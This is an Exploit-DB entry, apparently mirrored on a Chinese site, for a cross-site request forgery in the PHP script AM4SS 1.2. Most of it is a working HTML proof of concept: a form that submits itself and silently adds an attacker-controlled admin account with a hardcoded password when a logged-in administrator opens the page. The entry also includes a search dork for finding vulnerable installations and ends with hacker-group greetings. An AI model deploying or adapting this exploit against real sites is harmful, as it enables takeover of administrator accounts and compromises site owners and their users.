AM4SS 1.2 – Cross-Site Request Forgery (Add Admin)

  • 作者: red virus
    日期: 2011-09-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17800/
  • #Title:AM4SS Version 1.2- CSRF add Admin
#Script :AM4SS Version 1.2
#Language : Php
#Download : http://am4ss.org/am4ss.tar.gz 
#Date : 2011/09/09
#Version: 1.2
#Dork : "Powered by AM4SS "
#Found: by red virus >>> c3o@w.cn
#Homepage : www.alm3refh.com
 
 
 
<html>
<formname="r3dvirus" action="http://localhost/am4ss/admincp/users.php?do=add" method="post">
<input value="egypt"name="userfullname" type="text" /> 									
<input value="123456" name="password" type="text" /> 									
<input value="c3o@w.cn"name="useremail" type="text" />							
<input value="EG"name="country" type="text" />
<input value="3"name="usergroup" type="text" />
<input value="save"name="do" type="text" />																
</form>
<script>document.r3dvirus.submit();</script>
</html>

###########################################################################################################
greats 2
 >>> alm3refh.com - tryag.cc - joood
T3rr0rist & cyb3r-1st & i-Hmx & h311 c0d3 & orange man
infofst & virus hima & Karar aLShaMi & b0x & all alm3refh group